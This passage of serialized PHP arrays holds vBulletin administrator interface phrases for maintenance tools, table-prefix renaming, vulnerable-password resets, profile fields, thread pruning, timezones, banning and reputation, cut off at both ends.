Send At Once\";s:21:\"empty_signature_cache\";s:21:\"Empty Signature Cache\";s:24:\"error_attachment_missing\";s:25:\"Error: Attachment Missing\";s:24:\"error_thumbnail_failed_x\";s:27:\"Error: Library Error: %1$s\";s:29:\"error_thumbnail_nocreateimage\";s:52:\"Error: Invalid image file or GD version is set wrong\";s:30:\"error_thumbnail_nogetimagesize\";s:37:\"Error: Could not determine image size\";s:21:\"error_thumbnail_nogif\";s:28:\"Error: PHP lacks GIF support\";s:21:\"error_thumbnail_nojpg\";s:28:\"Error: PHP lacks JPG support\";s:21:\"error_thumbnail_nopng\";s:28:\"Error: PHP lacks PNG support\";s:25:\"error_thumbnail_nosupport\";s:52:\"No support for this type in the chosen image library\";s:31:\"error_thumbnail_notcorrectimage\";s:33:\"Incorrect extension for this file\";s:31:\"error_thumbnail_notenoughmemory\";s:24:\"Error: Not Enough Memory\";s:22:\"error_thumbnailalready\";s:34:\"Image is already <= thumbnail size\";s:36:\"finds_users_without_complete_entries\";s:204:\"Finds any users who do not have complete entries in the database. Sometimes the data is not inserted correctly and the user\'s profile becomes unusable. Running this should correct any incomplete profiles.\";s:15:\"first_post_date\";s:15:\"First Post Date\";s:24:\"fix_broken_user_profiles\";s:24:\"Fix broken user profiles\";s:38:\"function_allows_rebuild_all_style_info\";s:173:\"This function allows you to completely rebuild all style information. This is necessary after a major upgrade, or if you have manually edited any of the \'special\' templates.\";s:28:\"function_rebuilds_reputation\";s:239:\"This function recalculates user reputation using the value that you specify below then adds the total reputation the user has received so far. This will remove any custom reputation that has been given to the user through the user editor.\";s:28:\"function_rebuilds_thumbnails\";s:161:\"This function rebuilds the attachment thumbnails. It is needed when you enable thumbnails, change the thumbnail dimensions, or change the thumbnail JPG quality.\";s:29:\"function_removes_orphan_posts\";s:76:\"This function removes all posts that belong to threads that no longer exist.\";s:31:\"function_removes_orphan_threads\";s:77:\"This function removes all threads that belong to forums that no longer exist.\";s:37:\"include_automatic_javascript_redirect\";s:51:\"Include automatic JavaScript redirect to next page?\";s:17:\"last_upgrade_date\";s:17:\"Last Upgrade Date\";s:26:\"list_of_tables_in_db_below\";s:218:\"Below is a list of all the tables in your database.\r\nYou should make sure that you select only tables that are part of vBulletin.
\r\nIf you are not sure, do not continue with this operation.
\r\n\";s:10:\"max_height\";s:14:\"Maximum Height\";s:9:\"max_width\";s:13:\"Maximum Width\";s:22:\"new_prefix_same_as_old\";s:148:\"You have not chosen a new table prefix, this script cannot continue. \r\n(Old table prefix: \'%1$s \', new table prefix: \'%2$s \')\";s:14:\"new_table_name\";s:16:\"New Table Name\r\n\";s:16:\"new_table_prefix\";s:18:\"New Table Prefix\r\n\";s:32:\"note_duplicate_threads_have_same\";s:146:\"Note: Duplicate threads are threads that have the same title, post name, and post time and are posting in the same forum as another thread.\";s:32:\"note_rebuild_similar_thread_list\";s:166:\"Note: This will rebuild the similar thread list regardless of whether they are enabled or not. However, they will not be displayed until the option is enabled.\";s:31:\"note_reindexing_empty_indexes_x\";s:133:\"Note: If you are re-indexing, you may want to empty the indexes. Click Here to do so! \";s:21:\"note_server_intensive\";s:48:\"Note: This is a server intensive process.\";s:42:\"number_of_attachments_to_process_per_cycle\";s:42:\"Number of attachments to process per cycle\";s:38:\"number_of_avatars_to_process_per_cycle\";s:38:\"Number of avatars to process per cycle\";s:37:\"number_of_forums_to_process_per_cycle\";s:37:\"Number of forums to process per cycle\";s:36:\"number_of_icons_to_process_per_cycle\";s:36:\"Number of icons to process per cycle\";s:36:\"number_of_posts_to_process_per_cycle\";s:36:\"Number of posts to process per cycle\";s:38:\"number_of_threads_to_process_per_cycle\";s:38:\"Number of threads to process per cycle\";s:36:\"number_of_users_to_process_per_cycle\";s:36:\"Number of users to process per cycle\";s:16:\"old_table_prefix\";s:18:\"Old Table Prefix\r\n\";s:45:\"only_accounts_using_language_x_were_processed\";s:80:\"Only accounts configured to use the language \'%1$s\' were processed and notified.\";s:13:\"optional_info\";s:20:\"Optional Information\";s:19:\"original_table_name\";s:21:\"Original Table Name\r\n\";s:20:\"other_prefix_warning\";s:202:\"WARNING! The following tables do not have the\r\noriginal table prefix! These tables may not be part of vBulletin.\r\n\r\nAre you absolutely sure you want to continue?\r\n\";s:16:\"over_1_month_ago\";s:16:\"Over 1 month ago\";s:15:\"over_1_week_ago\";s:15:\"Over 1 week ago\";s:15:\"over_any_period\";s:15:\"Over any period\";s:15:\"over_x_days_ago\";s:18:\"Over %1$s days ago\";s:17:\"over_x_months_ago\";s:20:\"Over %1$s months ago\";s:16:\"over_x_weeks_ago\";s:19:\"Over %1$s weeks ago\";s:21:\"password_check_notice\";s:1481:\"Some users may have created accounts with vulnerable passwords. Vulnerable passwords can be passwords that are: \r\nThe same as the account username \r\nSuch passwords make accounts vulnerable to exploitation from automated scripts and programs that can guess the password to access your board under the guise of the \r\naffected users. This may be done for the purposes of spam or online identity theft. \r\nUsers can no longer create accounts with the above vulnerabilities, but older accounts may still be affected. Affected users will be prompted to change their current password the next time they login. However, older accounts may still be vulnerable where the user no longer uses the account to access your board. Note that if you force a reset of an account and the email address associated with the account is no longer valid, the user may effectively be locked out of that account. \r\nFor this reason you may choose which accounts to reset based on the users\' last activity. Users who have recently logged in are more likely to change their password and email settings themselves. \r\nIt is advised that accounts that have not been accessed recently are reset first. You can check at a later time or date how many affected accounts remain before deciding to force a password reset. \r\nWhen you perform a reset, an email will be sent to the affected users. You will have an option to change the email message. \";s:42:\"password_vulnerability_email_message_label\";s:324:\"Email MessageYou can change the default message that is sent to users when their password is reset. The tokens {username} and {password} can be placed in the message and will be replaced by their values for each individual user.You must insert the token {password} in the email. \";s:15:\"passwords_reset\";s:15:\"Passwords Reset\";s:14:\"php_extensions\";s:14:\"PHP Extensions\";s:16:\"php_openbase_dir\";s:16:\"PHP Open Basedir\";s:13:\"php_safe_mode\";s:13:\"PHP Safe Mode\";s:34:\"please_read_notes_after_completion\";s:77:\"Please read the notes at the bottom of this page when processing is complete.\";s:19:\"post_id_to_start_at\";s:19:\"Post ID to start at\";s:13:\"posts_queried\";s:13:\"Posts Queried\";s:21:\"prefix_change_confirm\";s:326:\"If you are sure you want to continue and rename the tables listed\r\nabove, click the rename button below.
\r\nNote: This is your final chance to stop. Clicking the button below will alter\r\nall the tables listed above, requiring you to edit your config.php file\r\nbefore your vBulletin will work again.
\r\n\";s:17:\"processing_time_x\";s:21:\"Processing Time: %1$s\";s:29:\"querying_first_post_of_thread\";s:32:\"Querying first post of thread...\";s:21:\"rebuild_album_updates\";s:21:\"Rebuild Album Updates\";s:29:\"rebuild_attachment_thumbnails\";s:29:\"Rebuild Attachment Thumbnails\";s:25:\"rebuild_avatar_thumbnails\";s:25:\"Rebuild Avatar Thumbnails\";s:32:\"rebuild_custom_avatar_thumbnails\";s:32:\"Rebuild Custom Avatar Thumbnails\";s:25:\"rebuild_forum_information\";s:25:\"Rebuild Forum Information\";s:18:\"rebuild_post_cache\";s:18:\"Rebuild Post Cache\";s:43:\"rebuild_recently_updated_albums_description\";s:258:\"This will recalculate the albums to display in the Recently Updated Albums list, effectively removing any albums that are no longer accessible. This may be the case if any users recently made album updates but have since had their album permissions revoked.\";s:36:\"rebuild_recently_updated_albums_list\";s:31:\"Rebuild Recently Updated Albums\";s:20:\"rebuild_search_index\";s:20:\"Rebuild Search Index\";s:25:\"rebuild_sgicon_thumbnails\";s:36:\"Rebuild Social Group Icon Thumbnails\";s:23:\"rebuild_similar_threads\";s:23:\"Rebuild Similar Threads\";s:18:\"rebuild_statistics\";s:18:\"Rebuild Statistics\";s:26:\"rebuild_statistics_warning\";s:212:\"Rebuilding statistics will cause the loss of the total forum view and active users data. Only run this if you believe you really need to! Once the data has been replaced, there is no way to restore your database.\";s:14:\"rebuild_styles\";s:14:\"Rebuild Styles\";s:26:\"rebuild_thread_information\";s:26:\"Rebuild Thread Information\";s:23:\"rebuild_user_reputation\";s:23:\"Rebuild User Reputation\";s:37:\"recalculate_users_post_counts_warning\";s:497:\"This will recalculate all of your user\'s post counts based on their CURRENT posts in the database. Do not run this if you have pruned posts, manually changed post counts, or imported from another forum package and you wish to maintain your users\' current counts. Your members\' post counts will PROBABLY decrease so only run this if you believe you really need to! Once they decrease you cannot bring them back up without restoring your database or manually editing each user. You have been warned!\";s:19:\"remove_orphan_posts\";s:19:\"Remove Orphan Posts\";s:21:\"remove_orphan_threads\";s:21:\"Remove Orphan Threads\";s:26:\"removing_duplicate_threads\";s:29:\"Removing duplicate threads...\";s:23:\"removing_orphan_threads\";s:23:\"Removing Orphan Threads\";s:17:\"rename_sql_tables\";s:17:\"Rename SQL Tables\";s:14:\"rename_table_x\";s:27:\"Rename Table %1$s ?\r\n\";s:13:\"rename_tables\";s:15:\"Rename Tables\r\n\";s:25:\"renaming_process_complete\";s:27:\"Renaming Process Complete\r\n\";s:30:\"renaming_table_with_new_prefix\";s:37:\"Renaming Tables With New Table Prefix\";s:15:\"renaming_x_to_y\";s:40:\"Renaming %1$s to %2$s ... \";s:31:\"renumber_all_templates_from_one\";s:187:\"Renumber all templates from 1 Note: this option requires that your MySQL account has ALTER, CREATE and DROP privileges. If you are not sure, do not use this option! \";s:15:\"reputation_base\";s:21:\"Base Reputation Value\";s:33:\"reset_accounts_with_last_activity\";s:33:\"Reset Accounts with Last Activity\";s:30:\"reset_password_if_email_failed\";s:193:\"Reset Password if Email Failed\r\nThis option allows you to reset the password even if the email attempt failed. Only choose this option if the email attempts are failing consistently. \";s:15:\"reset_passwords\";s:15:\"Reset Passwords\";s:39:\"reset_passwords_for_users_with_language\";s:138:\"Reset Passwords for Accounts Using LanguageOnly reset and notify users who have their accounts configured to use this language. \";s:26:\"reset_vulnerable_passwords\";s:26:\"Reset Vulnerable Passwords\";s:9:\"send_info\";s:16:\"Send Information\";s:10:\"set_all_no\";s:10:\"Set All No\";s:11:\"set_all_yes\";s:13:\"Set All Yes\r\n\";s:45:\"some_errors_occured_while_resetting_passwords\";s:105:\"Some errors occurred while resetting passwords. The affected accounts did not have their password reset.\";s:40:\"some_errors_occured_while_sending_emails\";s:179:\"Some errors occurred while sending emails to the users. The affected accounts did not have their password reset, unless you chose to reset the password even when emailing failed.\";s:19:\"system_architecture\";s:19:\"System Architecture\";s:10:\"table_name\";s:19:\"Table Name \r\n\";s:22:\"table_x_does_not_exist\";s:37:\"Table \'%1$s \' does not exist!\r\n\";s:28:\"tableprefix_change_completed\";s:346:\"This script has now completed. \r\nYour table prefix has been changed from \'%1$s \' to \'%2$s \'.
\r\nYou must now edit your includes/config.php file to include the line:
\r\n$config[\'Database\'][\'tableprefix\'] = \'%2$s\'; \r\nYour vBulletin installation will not function until you do this.
\r\n\";s:51:\"this_script_will_allow_you_to_rename_your_vb_tables\";s:378:\"This script will allow you to rename your vBulletin SQL tables in order to accommodate a new table prefix value in includes/config.php .
\r\nNote: Do not alter the tableprefix value in config.php until this script has completed and you are given a message telling you to edit the value.
\r\nYour table prefix is currently set to \'%1$s\' .
\";s:19:\"threaded_mode_usage\";s:19:\"Threaded Mode Usage\";s:17:\"thumbnail_quality\";s:36:\"Quality of JPG thumbnails (0 .. 100)\";s:5:\"today\";s:5:\"Today\";s:12:\"total_forums\";s:12:\"Total Forums\";s:26:\"total_number_posts_process\";s:62:\"Total number of posts to process: (0 for unlimited) \";s:11:\"total_posts\";s:11:\"Total Posts\";s:23:\"total_posts_processed_x\";s:27:\"Total Posts Processed: %1$s\";s:16:\"total_usergroups\";s:16:\"Total Usergroups\";s:11:\"total_users\";s:11:\"Total Users\";s:21:\"unable_to_read_avatar\";s:21:\"Unable to read avatar\";s:18:\"update_post_counts\";s:18:\"Update Post Counts\";s:18:\"update_user_titles\";s:28:\"Update User Titles and Ranks\";s:16:\"update_usernames\";s:17:\"Update User Names\";s:15:\"updating_forums\";s:15:\"Updating Forums\";s:24:\"updating_similar_threads\";s:24:\"Updating Similar Threads\";s:16:\"updating_threads\";s:16:\"Updating Threads\";s:18:\"updating_user_info\";s:21:\"Updating user info...\";s:18:\"updating_usernames\";s:19:\"Updating User Names\";s:36:\"vbulletin_table_prefix_rename_system\";s:38:\"vBulletin 3 Table Prefix Rename System\";s:17:\"vbulletin_version\";s:17:\"vBulletin Version\";s:31:\"vulnerable_password_reset_email\";s:872:\"Dear {username},\r\n\r\nA vulnerability has been found with your password at %1$s. Some passwords are vulnerable to exploitation which may allow a third party to hijack your account.\r\n\r\nThis may lead to your account being used without your knowledge or permission, and actions being performed under your name.\r\n\r\nVulnerable accounts can also be bad for the board as a whole as they may enable access for automated tools to spam both the forums and other user accounts, \r\nusing your username.\r\n\r\nAs such we have had to reset your password.\r\nYou can find your new login details below.\r\n\r\nUsername: {username}\r\nPassword: {password}\r\n\r\nIf you want to change your password, login with the above details at the following location:\r\n%2$s/profile.php?do=editpassword\r\n\r\n\r\nWe apologize for any inconvenience this may cause and appreciate your understanding.\r\n\r\n\r\n\r\nAll the best,\r\n%1$s\";s:39:\"vulnerable_password_reset_email_subject\";s:37:\"%1$s - Account Password Vulnerability\";s:20:\"x_accounts_processed\";s:23:\"%1$s accounts processed\";s:27:\"x_of_y_passwords_were_reset\";s:52:\"%1$s of %2$s password(s) were reset \";s:46:\"you_have_chosen_to_rename_the_following_tables\";s:46:\"You have chosen to rename the following tables\";}', 'a:69:{s:14:\"add_new_option\";s:14:\"Add New Option\";s:30:\"add_new_profile_field_category\";s:30:\"Add New Profile Field Category\";s:26:\"add_new_user_profile_field\";s:26:\"Add New User Profile Field\";s:7:\"after_x\";s:12:\"After \'%1$s\'\";s:51:\"allow_user_to_input_their_own_value_for_this_option\";s:51:\"Allow user to input their own value for this option\";s:55:\"are_you_sure_you_want_to_delete_this_user_profile_field\";s:56:\"Are you sure you want to delete this User Profile Field?\";s:61:\"are_you_sure_you_want_to_delete_user_profile_field_category_x\";s:326:\"Are you sure you want to delete this user profile field category?\r\n\r\n %1$s \r\n (Contains %2$s Profile Fields)
\r\n \r\nAny profile fields belonging to this category will become %3$s but will not be deleted.\";s:26:\"blocks_column_after_albums\";s:27:\"Blocks Column, After Albums\";s:30:\"blocks_column_after_mini_stats\";s:31:\"Blocks Column, After Mini Stats\";s:19:\"blocks_column_first\";s:20:\"Blocks Column, First\";s:18:\"blocks_column_last\";s:19:\"Blocks Column, Last\";s:10:\"box_height\";s:90:\"Box HeightNumber of options to display simultaneously. 0 will display them all. \";s:29:\"choose_limit_choices_add_info\";s:112:\"If you choose to limit the number of choices in the next option, please add that information to the description.\";s:17:\"contains_x_fields\";s:20:\"Contains %1$s Fields\";s:58:\"default_value_you_may_specify_a_default_registration_value\";s:116:\"Default ValueYou may specify a default value that is entered into this field at the time of registration. \";s:12:\"display_page\";s:12:\"Display Page\";s:32:\"edit_user_profile_field_category\";s:32:\"Edit User Profile Field Category\";s:8:\"editable\";s:8:\"Editable\";s:22:\"field_editable_by_user\";s:22:\"Field Editable by User\";s:23:\"field_hidden_on_profile\";s:13:\"Private Field\";s:12:\"field_length\";s:12:\"Field Length\";s:32:\"field_searchable_on_members_list\";s:32:\"Field Searchable on Members List\";s:6:\"fields\";s:6:\"Fields\";s:18:\"fields_from_form_x\";s:59:\"Profile Fields from Form \'%1$s \'\";s:6:\"hidden\";s:6:\"Hidden\";s:14:\"items_per_line\";s:88:\"Items Per LineInput 0 to display all of the controls on the same line. \";s:15:\"limit_selection\";s:142:\"Limit SelectionMaximum number of options the user may select. Enter 0 to allow them to choose all of the options. \";s:28:\"location_on_profile_page_dfn\";s:140:\"Location on Profile Page\r\nProfile fields will always be shown on the \'About Me\' tab, in addition to any location you select here. \";s:21:\"main_column_first_tab\";s:22:\"Main Column, First Tab\";s:20:\"main_column_last_tab\";s:21:\"Main Column, Last Tab\";s:9:\"messaging\";s:9:\"Messaging\";s:22:\"multiple_line_text_box\";s:22:\"Multiple-Line Text Box\";s:27:\"multiple_selection_checkbox\";s:27:\"Multiple-Selection Checkbox\";s:23:\"multiple_selection_menu\";s:23:\"Multiple-Selection Menu\";s:4:\"name\";s:4:\"Name\";s:18:\"no_but_on_register\";s:31:\"No, but display at registration\";s:50:\"no_user_profile_field_categories_have_been_created\";s:113:\"No user profile field categories have been created. \r\n \r\nClick the link below to create a new category.\";s:19:\"note_max_31_options\";s:66:\"Note: You may have a maximum of 31 options in this field.\";s:20:\"only_at_registration\";s:20:\"Only at registration\";s:20:\"only_in_about_me_tab\";s:26:\"Only in the \'About Me\' Tab\";s:14:\"optional_input\";s:14:\"Optional Input\";s:5:\"other\";s:5:\"Other\";s:20:\"other_please_specify\";s:22:\"Other (please specify)\";s:9:\"postition\";s:8:\"Position\";s:7:\"privacy\";s:7:\"Privacy\";s:22:\"profile_field_category\";s:22:\"Profile Field Category\";s:18:\"profile_field_type\";s:18:\"Profile Field Type\";s:32:\"regular_expression_require_match\";s:185:\"Regular ExpressionYou may require the input field to match a regular expression (PCRE ). \";s:6:\"rename\";s:6:\"Rename\";s:8:\"required\";s:8:\"Required\";s:10:\"searchable\";s:10:\"Searchable\";s:24:\"set_default_if_yes_first\";s:74:\"Set Default Will set the first non blank option as the default. \";s:20:\"show_on_members_list\";s:20:\"Show on Members List\";s:20:\"single_line_text_box\";s:20:\"Single-Line Text Box\";s:21:\"single_selection_menu\";s:21:\"Single-Selection Menu\";s:30:\"single_selection_radio_buttons\";s:30:\"Single-Selection Radio Buttons\";s:16:\"text_area_height\";s:16:\"Text Area Height\";s:30:\"this_profile_fields_no_options\";s:39:\"This user profile field has no options.\";s:14:\"thread_viewing\";s:14:\"Thread Viewing\";s:13:\"uncategorized\";s:13:\"Uncategorized\";s:29:\"user_profile_field_categories\";s:29:\"User Profile Field Categories\";s:26:\"user_profile_field_manager\";s:26:\"User Profile Field Manager\";s:29:\"user_profile_fields_in_area_x\";s:64:\"User Profile Fields in Area: %1$s \";s:26:\"which_page_displays_option\";s:257:\"Which page displays this option?If you select \"Edit Your Details\", this option will show up when viewing a user\'s profile. All other options are primarily used in conjunction with template conditionals to create additional options for your users. \";s:10:\"yes_always\";s:11:\"Yes, Always\";s:19:\"yes_at_registration\";s:41:\"Yes, at registration and profile updating\";s:23:\"yes_but_no_blank_option\";s:30:\"Yes, but No First Blank Option\";s:21:\"yes_including_a_blank\";s:35:\"Yes, Including a First Blank Option\";s:37:\"you_close_before_modifying_checkboxes\";s:61:\"You should close your forum before modifying checkbox fields.\";}', 'a:77:{s:55:\"about_to_delete_post_edit_histories_in_forum_x_by_users\";s:103:\"You are about to delete all post edit histories in forum %1$s by one of these users. Please select one:\";s:41:\"about_to_delete_posts_in_forum_x_by_users\";s:101:\"You are about to delete all posts and threads in forum %1$s by one of these users. Please select one:\";s:7:\"add_tag\";s:7:\"Add Tag\";s:51:\"are_you_sure_you_want_to_delete_these_subscriptions\";s:52:\"Are you sure you want to delete these Subscriptions?\";s:31:\"attachments_awaiting_moderation\";s:31:\"Attachments Awaiting Moderation\";s:12:\"date_options\";s:12:\"Date Options\";s:10:\"date_range\";s:10:\"Date Range\";s:11:\"delete_poll\";s:11:\"Delete Poll\";s:10:\"deleted_by\";s:10:\"Deleted By\";s:13:\"deleted_posts\";s:13:\"Deleted Posts\";s:15:\"deleted_threads\";s:15:\"Deleted Threads\";s:28:\"deleting_post_edit_histories\";s:28:\"Deleting Post Edit Histories\";s:14:\"deleting_posts\";s:14:\"Deleting Posts\";s:16:\"deleting_threads\";s:16:\"Deleting Threads\";s:22:\"display_alphabetically\";s:22:\"Display Alphabetically\";s:14:\"display_newest\";s:14:\"Display Newest\";s:32:\"enter_the_threadid_of_the_thread\";s:76:\"Enter the threadid of the thread which contains the poll you wish to delete\";s:34:\"enter_the_threadids_of_the_threads\";s:135:\"Enter the threadid(s) of the threads from which you want to unsubscribe users.(separate ids with spaces - eg: 1 2 6 9) \";s:26:\"events_awaiting_moderation\";s:26:\"Events Awaiting Moderation\";s:20:\"include_child_forums\";s:20:\"Include Child Forums\";s:38:\"last_post_date_is_at_least_xx_days_ago\";s:37:\"Last post date is at least X days ago\";s:37:\"last_post_date_is_at_most_xx_days_ago\";s:36:\"Last post date is at most X days ago\";s:43:\"last_post_edit_date_is_at_least_xx_days_ago\";s:37:\"Last post edit is at least X days old\";s:42:\"last_post_edit_date_is_at_most_xx_days_ago\";s:36:\"Last post edit is at most X days old\";s:43:\"last_post_in_thread_is_at_least_xx_days_ago\";s:42:\"Last post in thread is at least X days ago\";s:42:\"last_post_in_thread_is_at_most_xx_days_ago\";s:41:\"Last post in thread is at most X days ago\";s:16:\"move_all_threads\";s:16:\"Move All Threads\";s:12:\"move_threads\";s:12:\"Move Threads\";s:24:\"move_threads_selectively\";s:24:\"Move Threads Selectively\";s:34:\"no_attachments_awaiting_moderation\";s:34:\"No Attachments awaiting moderation\";s:29:\"no_events_awaiting_moderation\";s:29:\"No Events awaiting moderation\";s:31:\"no_messages_awaiting_moderation\";s:31:\"No Messages Awaiting Moderation\";s:28:\"no_posts_awaiting_moderation\";s:28:\"No Posts awaiting moderation\";s:15:\"no_tags_defined\";s:16:\"No tags defined.\";s:30:\"no_threads_awaiting_moderation\";s:30:\"No Threads awaiting moderation\";s:29:\"note_leave_x_specify_no_limit\";s:47:\"- Note: leave this at %1$s to specify no limit.\";s:5:\"notes\";s:5:\"Notes\";s:5:\"order\";s:5:\"Order\";s:42:\"original_post_date_is_at_least_xx_days_ago\";s:41:\"Original post date is at least X days ago\";s:41:\"original_post_date_is_at_most_xx_days_ago\";s:40:\"Original post date is at most X days ago\";s:13:\"other_options\";s:13:\"Other Options\";s:18:\"poll_x_in_thread_y\";s:28:\"Poll \'%1$s\' in thread \'%2$s\'\";s:25:\"posts_awaiting_moderation\";s:25:\"Posts Awaiting Moderation\";s:29:\"prune_all_post_edit_histories\";s:29:\"Prune All Post Edit Histories\";s:17:\"prune_all_threads\";s:17:\"Prune All Threads\";s:45:\"prune_all_x_post_edit_histories_automatically\";s:66:\"Prune All of "%1$s\'s" Posts Edit Histories Automatically\";s:31:\"prune_all_x_posts_automatically\";s:51:\"Prune All of "%1$s\'s" Posts Automatically\";s:17:\"prune_by_username\";s:92:\"Prune by UsernameNote: This includes individual posts made by the specified user. \";s:31:\"prune_post_edit_history_manager\";s:31:\"Prune Post Edit History Manager\";s:11:\"prune_posts\";s:11:\"Prune Posts\";s:13:\"prune_threads\";s:13:\"Prune Threads\";s:21:\"prune_threads_manager\";s:21:\"Prune Threads Manager\";s:25:\"prune_threads_selectively\";s:25:\"Prune Threads Selectively\";s:25:\"prune_x_posts_selectively\";s:42:\"Prune "%1$s\'s" Posts Selectively\";s:52:\"pruning_many_histories_is_a_server_intensive_process\";s:129:\"Pruning many post edit histories is a server intensive process because of the amount of data that must be removed. Use with care!\";s:50:\"pruning_many_threads_is_a_server_intensive_process\";s:117:\"Pruning many threads is a server intensive process because of the amount of data that must be removed. Use with care!\";s:14:\"status_options\";s:14:\"Status Options\";s:8:\"tag_list\";s:8:\"Tag List\";s:30:\"thread_has_at_least_xx_replies\";s:29:\"Thread has at Least X Replies\";s:28:\"thread_has_at_least_xx_views\";s:27:\"Thread has at Least X Views\";s:29:\"thread_has_at_most_xx_replies\";s:28:\"Thread has at Most X Replies\";s:27:\"thread_has_at_most_xx_views\";s:26:\"Thread has at Most X Views\";s:14:\"thread_manager\";s:14:\"Thread Manager\";s:12:\"thread_title\";s:12:\"Thread Title\";s:27:\"threads_awaiting_moderation\";s:27:\"Threads Awaiting Moderation\";s:42:\"unsubsribe_all_threads_from_specific_users\";s:43:\"Unsubscribe All Threads from Specific Users\";s:42:\"unsubsribe_all_users_from_specific_threads\";s:43:\"Unsubscribe All Users from Specific Threads\";s:16:\"updating_editlog\";s:16:\"Updating Editlog\";s:12:\"user_profile\";s:12:\"User Profile\";s:34:\"username_leave_blank_to_remove_all\";s:79:\"User NameLeave this blank to remove ALL thread subscriptions. \";s:8:\"validate\";s:8:\"Validate\";s:18:\"view_deleted_posts\";s:18:\"View Deleted Posts\";s:12:\"view_options\";s:12:\"View Options\";s:36:\"visitor_messages_awaiting_moderation\";s:36:\"Visitor Messages Awaiting Moderation\";s:38:\"x_post_with_edit_history_matches_found\";s:41:\"%1$s Post With Edit History Matches Found\";s:29:\"x_subscriptions_matches_found\";s:32:\"%1$s Subscriptions Matches Found\";s:22:\"x_thread_matches_found\";s:25:\"%1$s Thread Matches Found\";}', 'a:33:{s:23:\"timezone_gmt_minus_0100\";s:43:\"(GMT -1:00 hour) Azores, Cape Verde Islands\";s:23:\"timezone_gmt_minus_0200\";s:24:\"(GMT -2:00) Mid-Atlantic\";s:23:\"timezone_gmt_minus_0300\";s:44:\"(GMT -3:00) Brazil, Buenos Aires, Georgetown\";s:23:\"timezone_gmt_minus_0330\";s:24:\"(GMT -3:30) Newfoundland\";s:23:\"timezone_gmt_minus_0400\";s:52:\"(GMT -4:00) Atlantic Time (Canada), La Paz, Santiago\";s:23:\"timezone_gmt_minus_0430\";s:19:\"(GMT -4:30) Caracas\";s:23:\"timezone_gmt_minus_0500\";s:56:\"(GMT -5:00) Eastern Time (US & Canada), Bogota, Lima\";s:23:\"timezone_gmt_minus_0600\";s:55:\"(GMT -6:00) Central Time (US & Canada), Mexico City\";s:23:\"timezone_gmt_minus_0700\";s:43:\"(GMT -7:00) Mountain Time (US & Canada)\";s:23:\"timezone_gmt_minus_0800\";s:42:\"(GMT -8:00) Pacific Time (US & Canada)\";s:23:\"timezone_gmt_minus_0900\";s:18:\"(GMT -9:00) Alaska\";s:23:\"timezone_gmt_minus_1000\";s:19:\"(GMT -10:00) Hawaii\";s:23:\"timezone_gmt_minus_1100\";s:33:\"(GMT -11:00) Midway Island, Samoa\";s:23:\"timezone_gmt_minus_1200\";s:32:\"(GMT -12:00) Eniwetok, Kwajalein\";s:22:\"timezone_gmt_plus_0000\";s:53:\"(GMT) Western Europe Time, London, Lisbon, Casablanca\";s:22:\"timezone_gmt_plus_0100\";s:52:\"(GMT +1:00 hour) Brussels, Copenhagen, Madrid, Paris\";s:22:\"timezone_gmt_plus_0200\";s:44:\"(GMT +2:00) Kaliningrad, South Africa, Cairo\";s:22:\"timezone_gmt_plus_0300\";s:51:\"(GMT +3:00) Baghdad, Riyadh, Moscow, St. Petersburg\";s:22:\"timezone_gmt_plus_0330\";s:18:\"(GMT +3:30) Tehran\";s:22:\"timezone_gmt_plus_0400\";s:44:\"(GMT +4:00) Abu Dhabi, Muscat, Baku, Tbilisi\";s:22:\"timezone_gmt_plus_0430\";s:17:\"(GMT +4:30) Kabul\";s:22:\"timezone_gmt_plus_0500\";s:54:\"(GMT +5:00) Ekaterinburg, Islamabad, Karachi, Tashkent\";s:22:\"timezone_gmt_plus_0530\";s:47:\"(GMT +5:30) Mumbai, Kolkata, Chennai, New Delhi\";s:22:\"timezone_gmt_plus_0545\";s:21:\"(GMT +5:45) Kathmandu\";s:22:\"timezone_gmt_plus_0600\";s:34:\"(GMT +6:00) Almaty, Dhaka, Colombo\";s:22:\"timezone_gmt_plus_0630\";s:33:\"(GMT +6:30) Yangon, Cocos Islands\";s:22:\"timezone_gmt_plus_0700\";s:35:\"(GMT +7:00) Bangkok, Hanoi, Jakarta\";s:22:\"timezone_gmt_plus_0800\";s:48:\"(GMT +8:00) Beijing, Perth, Singapore, Hong Kong\";s:22:\"timezone_gmt_plus_0900\";s:49:\"(GMT +9:00) Tokyo, Seoul, Osaka, Sapporo, Yakutsk\";s:22:\"timezone_gmt_plus_0930\";s:28:\"(GMT +9:30) Adelaide, Darwin\";s:22:\"timezone_gmt_plus_1000\";s:49:\"(GMT +10:00) Eastern Australia, Guam, Vladivostok\";s:22:\"timezone_gmt_plus_1100\";s:52:\"(GMT +11:00) Magadan, Solomon Islands, New Caledonia\";s:22:\"timezone_gmt_plus_1200\";s:50:\"(GMT +12:00) Auckland, Wellington, Fiji, Kamchatka\";}', 'a:21:{s:11:\"ban_options\";s:11:\"Ban Options\";s:10:\"ban_period\";s:10:\"Ban Period\";s:10:\"ban_reason\";s:10:\"Ban Reason\";s:18:\"ban_time_remaining\";s:18:\"Ban Time Remaining\";s:8:\"ban_user\";s:8:\"Ban User\";s:21:\"ban_will_be_lifted_on\";s:21:\"Ban Will Be Lifted On\";s:9:\"banned_by\";s:9:\"Banned By\";s:9:\"banned_on\";s:9:\"Banned On\";s:7:\"banning\";s:7:\"Banning\";s:21:\"confirm_ban_lift_on_x\";s:46:\"Are you sure you want to lift the ban on %1$s?\";s:7:\"forever\";s:7:\"Forever\";s:8:\"lift_ban\";s:8:\"Lift Ban\";s:14:\"lift_ban_after\";s:112:\"Lift Ban After...Select the length of the ban here. The ban will be lifted at the time specified \";s:14:\"never_lift_ban\";s:14:\"Never Lift Ban\";s:13:\"permanent_ban\";s:13:\"Permanent Ban\";s:21:\"permanent_ban_options\";s:21:\"Permanent Ban Options\";s:13:\"temporary_ban\";s:13:\"Temporary Ban\";s:21:\"temporary_ban_options\";s:21:\"Temporary Ban Options\";s:15:\"user_ban_reason\";s:23:\"Reason to show the user\";s:12:\"user_banning\";s:12:\"User Banning\";s:19:\"will_be_lifted_soon\";s:19:\"Will be lifted soon\";}', 'a:26:{s:24:\"add_new_reputation_level\";s:24:\"Add New Reputation Level\";s:17:\"add_to_reputation\";s:17:\"Add to Reputation\";s:40:\"are_you_sure_want_to_delete_reputation_x\";s:48:\"Are you sure you want to delete reputation %1$s?\";s:54:\"are_you_sure_you_want_to_delete_the_reputation_level_x\";s:61:\"Are you sure you want to delete the Reputation Level: \'%1$s\'?\";s:21:\"comments_on_this_post\";s:21:\"Comments on this Post\";s:15:\"edit_reputation\";s:15:\"Edit Reputation\";s:4:\"even\";s:4:\"Even\";s:18:\"extremely_negative\";s:18:\"Extremely Negative\";s:18:\"extremely_positive\";s:18:\"Extremely 